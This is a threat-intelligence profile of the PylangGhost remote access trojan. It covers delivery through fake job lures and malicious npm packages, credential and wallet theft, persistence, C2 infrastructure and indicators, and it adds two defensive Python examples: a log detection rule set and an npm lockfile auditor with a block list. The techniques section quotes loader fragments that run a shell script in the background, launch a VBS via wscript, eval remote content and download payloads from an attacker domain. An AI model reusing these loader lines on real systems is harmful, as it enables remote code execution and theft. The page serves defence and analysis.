PylangGhost
PylangGhost is a Python-based remote access trojan (RAT) associated with North Korean threat activity, most consistently attributed in the provided reporting to FAMOUS CHOLLIMA and also linked to the broader Contagious Interview / DeceptiveDevelopment ecosystem. It is described as a Python counterpart to GolangGhost, with both families sharing an identical or near-identical command structure and overlapping functionality. Reporting states that PylangGhost is primarily Windows-focused, while related GolangGhost variants emphasize broader multi-platform coverage; other reporting also describes PylangGhost and GolangGhost together as related multi-platform RATs.
Observed delivery vectors in the content include fake job interview and recruiter lures, ClickFix-style social engineering, malicious GitHub or coding-test projects, trojanized Node.js applications, and malicious npm packages. Public reporting cited here says PylangGhost was delivered through fake recruitment sites impersonating companies such as Coinbase and Robinhood, where victims were instructed to run PowerShell or curl commands that downloaded a ZIP archive. Another infection chain used a Visual Basic Script to launch a Python payload after a fake NVIDIA-related update lure. The malware was also observed on the npm registry for the first time in malicious packages including @jaime9008/math-service and react-refresh-update, and in a separate cluster of five npm packages abusing Cloudflare Pages and Workers: es6-runtimejs, winston-js-express, ether-bn.js, node-env-detector, and unique-string-64. Those npm campaigns used staged JavaScript loaders, environment profiling, sandbox checks, encrypted payloads, and runtime execution to evade detection.
Capabilities directly described in the content include remote system control, file manipulation, command execution, credential theft, cookie theft, and theft of browser extension data. Multiple reports state that PylangGhost steals Chrome credentials and cookies and can enumerate installed Chrome extension IDs. It is specifically described as engineered to defeat Google Chrome app-bound credential protection and to steal stored passwords and authentication cookies. Cisco Talos reporting cited in the content says it steals credentials from more than 80 browser extensions, including cryptocurrency wallets such as MetaMask, Phantom, and TronLink, and password managers such as 1Password and NordPass. Additional reporting says the GolangGhost/PylangGhost stealer module can gather Chrome extension data and includes functionality described as injecting a malicious MetaMask extension by modifying Chrome Secure Preferences and killing Chrome processes.
Persistence and execution details in the content include use of a VBS launcher and Windows registry Run-key persistence. One described package delivered a ZIP containing six Python modules, a VBS script, and a renamed Python interpreter disguised as nvidia.py; the VBS unpacked lib.zip and launched the RAT. Other reporting states that on Windows, PylangGhost/GolangGhost persistence uses HKCU\Software\Microsoft\Windows\CurrentVersion\Run to launch a VBS loader via wscript.exe. Runtime state was reported as stored in temporary-directory files such as .store and .host.
Command-and-control communications are described as HTTP POST based, with RC4-encrypted packets and MD5 checksums in some reporting. Observed user agents include python-requests. The content identifies several campaign-specific infrastructure elements and indicators. In the npm campaign involving @jaime9008/math-service and react-refresh-update, the loader used the hardcoded XOR key fdfdfdfdf3rykyjjgfkwi, the hardcoded campaign identifier ML2J, and infrastructure malicanbur[.]pro with C2 173.211.46.22:8080; the Windows payload hash was 0be2375362227f846c56c4de2db4d3113e197f0c605c297a7e0e0c154e94464e. In the Cloudflare Pages/Workers campaign, staged infrastructure included keo.pages.dev, dpw.jr12012025z.workers.dev, and deoft.org; the Windows payload SHA-256 was 9ec622624f5f07c5d86e6048f2710de1e9c5ac7c6a6fad4fcb31121bb67c0239, deoft.org resolved to 187.77.111.137, and config.py contained C2 address 187.127.248.20. Another sample associated with the recruitment-lure campaign is noted with hash c2137cd870de0af6662f56c97d27b86004f47b866ab27190a97bde7518a9ac1b.
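The persistence and C2 traits summarized above (Run-key value launching a VBS via wscript.exe, wscript handing off to a Python interpreter, HTTP POST beacons with a python-requests user agent to the listed C2 addresses) can be turned into simple detection rules. The block below is an added example, not code from any of the cited reports; the event records are constructed in a Sysmon-like shape and the rule names are my own.

```python
"""Detection logic for the persistence and C2 traits this page attributes to
PylangGhost. Added example; the event records are constructed, not real logs."""

RUN_KEY = "\\software\\microsoft\\windows\\currentversion\\run\\"
# C2 addresses quoted in the reporting summarized above.
KNOWN_C2 = {"173.211.46.22", "187.127.248.20"}

# Constructed records: id 13 = registry set, 1 = process create, 3 = network connect,
# plus two proxy-style HTTP records.
SAMPLE_EVENTS = [
    {"id": 13, "target": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Update",
     "details": r"wscript.exe C:\Users\dev\AppData\Local\Temp\update.vbs"},
    {"id": 13, "target": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive",
     "details": r"C:\Users\dev\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background"},
    {"id": 1, "parent": r"C:\Windows\System32\wscript.exe",
     "image": r"C:\Users\dev\AppData\Local\Temp\lib\nvidia.py", "cmdline": "nvidia.py main.py"},
    {"id": 1, "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Python312\python.exe", "cmdline": "python.exe build.py"},
    {"id": 3, "image": r"C:\Users\dev\AppData\Local\Temp\lib\nvidia.py",
     "dst_ip": "187.127.248.20", "dst_port": 8080},
    {"http": True, "method": "POST", "dst_ip": "173.211.46.22", "dst_port": 8080,
     "user_agent": "python-requests/2.31.0"},
    {"http": True, "method": "GET", "dst_ip": "203.0.113.10", "dst_port": 443,
     "user_agent": "python-requests/2.31.0"},
]

def detect(events):
    """Return (rule_name, event) pairs; each rule maps to one trait in the profile."""
    alerts = []
    for e in events:
        if e.get("id") == 13 and RUN_KEY in e["target"].lower():
            # Run-key value whose data launches a VBS through wscript.
            data = e["details"].lower()
            if "wscript" in data and ".vbs" in data:
                alerts.append(("run_key_wscript_vbs_loader", e))
        elif e.get("id") == 1 and e["parent"].lower().endswith("wscript.exe"):
            # VBS loader handing off to a Python interpreter, renamed or not.
            exe = (e["image"] + " " + e["cmdline"]).lower()
            if "python" in exe or ".py" in exe:
                alerts.append(("wscript_launches_python", e))
        elif e.get("id") == 3 and e["dst_ip"] in KNOWN_C2:
            alerts.append(("connection_to_known_c2", e))
        elif e.get("http") and e["method"] == "POST" \
                and e["user_agent"].startswith("python-requests") \
                and e["dst_ip"] in KNOWN_C2:
            # HTTP POST beacon with the python-requests user agent to a listed C2.
            alerts.append(("python_requests_post_to_known_c2", e))
    return alerts
```

The benign Run-key entry, the explorer-launched interpreter and the GET to an unlisted host are left unflagged, which is the behaviour the sample set checks.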
Targeting described in the content centers on software developers, job seekers, cryptocurrency and blockchain professionals, Web3 personnel, and finance and technology sectors, with several reports highlighting victims in India and broader software supply-chain risk through compromised dependencies and CI/CD environments. The malware is repeatedly linked with DPRK financially motivated operations and with malware families including BeaverTail, InvisibleFerret, OtterCookie, FlexibleFerret, and GolangGhost.
Groups observed using it
3 distinct threat actors attributed by public researchers.
"North Korea's abuse of Cloudflare Workers and Pages" published by Kmsec. #FamousChollima, #NPM, #PylangGhost, #DPRK, #CTI
A cluster of 5 npm packages abuse Cloudflare infrastructure (Pages/Workers) to deliver PylangGhost RAT ... Stage 3 (PylangGhost) ... As my gut told me, this is a PylangGhost infection chain.
First instance of PylangGhost RAT observed on npm ... PyLangGhost RAT: Rising Stealer from Lazarus Group Striking Finance and Technology
Techniques & procedures
18 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access (3 techniques)
A cluster of 5 npm packages abuse Cloudflare infrastructure (Pages/Workers) to deliver PylangGhost RAT... The intended workflow is for ether-bn.js to be installed as a dependency to a coding project, which then adds the malicious sub-dependencies.
"distribute malware to unsuspecting job seekers in the software development industry"; "pretext of a recruitment process or technical assignment"
Multiple titles reference 'Contagious Interview,' 'fake developer job interviews,' 'LinkedIn recruiting scam,' 'Recruitment Emails,' and 'Job Offer' lures used to deliver BeaverTail, InvisibleFerret, OtterCookie, PylangGhost, and GolangGhost.
Execution (7 techniques)
Several titles explicitly mention 'VS Code Tasks Abuse,' 'Tracking the VS Code Tasks Infection Vector,' and 'Evolution of VS Code and Cursor Tasks Infection Chains.'
execSync("chmod +x /var/tmp/camDriver.sh && nohup bash /var/tmp/camDriver.sh >/dev/null 2>&1 &"
const vbsPath = path.join(extractDir, "update.vbs")... const vbsProcess = spawn("wscript.exe", [vbsPath], runOptions);
The infection chain continues from JavaScript to wscript and eventually Python... wscript launching Python (PylangGhost).
The decrypted payload in full... This is what’s invoked by globalThis.eval... evaluates remote content held at keo[.]pages[.]dev/output-2.
The intended workflow is for ether-bn.js to be installed as a dependency to a coding project... infection happens at runtime as opposed to installation.
Once a developer installs an affected package, a JavaScript loader embedded in specific files runs automatically.
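The delivery paragraph in the profile and the Initial Access and Execution entries above describe the same pattern: a benign-looking package such as ether-bn.js is declared as a dependency and pulls the malicious sub-dependencies in transitively. One defensive check is to walk a project's lockfile graph and report which declared dependency introduced any of the named packages. This is an added example, not code from any cited report; the lockfile contents are constructed and `audit_lockfile` is my own helper.

```python
"""Audit an npm lockfile for the package names tied to PylangGhost delivery.
Added example; the lockfile below is constructed, not taken from any report."""
import json

# Package names given in the reporting summarized on this page.
KNOWN_BAD = {
    "@jaime9008/math-service", "react-refresh-update", "es6-runtimejs",
    "winston-js-express", "ether-bn.js", "node-env-detector", "unique-string-64",
}

# Constructed package-lock.json (lockfileVersion 3 layout): the project declares
# only ether-bn.js, which pulls two of the other names in as sub-dependencies.
SAMPLE_LOCK = json.dumps({
    "name": "demo-app", "lockfileVersion": 3,
    "packages": {
        "": {"dependencies": {"ether-bn.js": "^1.0.0", "lodash": "^4.17.21"}},
        "node_modules/lodash": {"version": "4.17.21"},
        "node_modules/ether-bn.js": {"version": "1.0.3", "dependencies": {
            "winston-js-express": "*", "node-env-detector": "*"}},
        "node_modules/winston-js-express": {"version": "0.2.1"},
        "node_modules/node-env-detector": {"version": "0.1.0"},
    },
})

def pkg_name(lock_key):
    """'node_modules/a/node_modules/@s/b' -> '@s/b' (text after the last node_modules/)."""
    return lock_key.rsplit("node_modules/", 1)[-1]

def audit_lockfile(lock_text, blocklist=KNOWN_BAD):
    """Map each listed package found to the dependency chains that pull it in."""
    packages = json.loads(lock_text).get("packages", {})
    by_name = {pkg_name(k): v for k, v in packages.items() if k}
    hits = {}

    def walk(name, chain):
        if name in chain:          # dependency graphs can cycle
            return
        chain = chain + [name]
        if name in blocklist:
            hits.setdefault(name, []).append(" > ".join(chain))
        for dep in by_name.get(name, {}).get("dependencies", {}):
            walk(dep, chain)

    for dep in packages.get("", {}).get("dependencies", {}):
        walk(dep, [])
    return hits
```

Because the reported infection happens at runtime rather than at install time, a lifecycle-script scan alone would miss this; the name match against the lockfile graph is what surfaces the transitive pull-in.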
Persistence (1 technique)
Privilege Escalation (1 technique)
Stealth (4 techniques)
Novel obfuscation techniques, encryption, runtime logic gates, and device fingerprinting are used to hinder detection... return globalThis.eval(payload).
The intended workflow is for ether-bn.js to be installed as a dependency to a coding project... infection happens at runtime as opposed to installation.
This loader follows a decode-decrypt-evaluate sequence and uses a hardcoded XOR key — the string “fdfdfdfdf3rykyjjgfkwi” — to unlock the hidden payload before it executes in memory.
Discovery (3 techniques)
It checks CPU, memory, and other attributes... function getWinSerial()... getMacSerial()... getLinuxSerial()... payload = { name: serial... social: process.platform... }
The RAT is also capable of enumerating Chrome extension IDs installed on the compromised machine, giving attackers a direct path to browser-stored credentials and sensitive personal data.
Command and Control (3 techniques)
The attacker’s command-and-control (C2) infrastructure relies on the domain malicanbur[.]pro, with a C2 IP address of 173.211.46[.]22:8080.
A cluster of 5 npm packages abuse Cloudflare infrastructure (Pages/Workers)... The encrypted string... decrypts to hxxps://dpw.jr12012025z.workers[.]dev, another piece of Cloudflare infrastructure.
const url = "https://deoft.org/pver-" + uniqueId + ".patch"... await downloadFile(url, archivePath)... downloadFile(url, scriptPath).
IOCs tracked for this family
22 indicators attributed across vendor reports, sandbox runs, and researcher write-ups.
Recent activity
17 sources tracked across advisories, community write-ups, and news.
From "North Korea's abuse of Cloudflare Workers and Pages" (Kmsec): Remote access trojan delivered through malicious npm packages and Cloudflare Pages/Workers infrastructure. The chain fingerprints the host, fetches staged JavaScript, contacts attacker-controlled infrastructure to obtain a victim-specific path, then downloads platform-specific payloads. The final bundle includes Windows, Linux, and macOS infection paths and uses C2 at 187.127.248.20.
"NICKEL ALLEY strategy: Fake it ‘til you make it" published by Sophos (shared by lazarusholic.bsky.social).
A Python variant of FlexibleFerret/WeaselStore propagated via malicious npm packages and also deployed through newer VS Code project chains.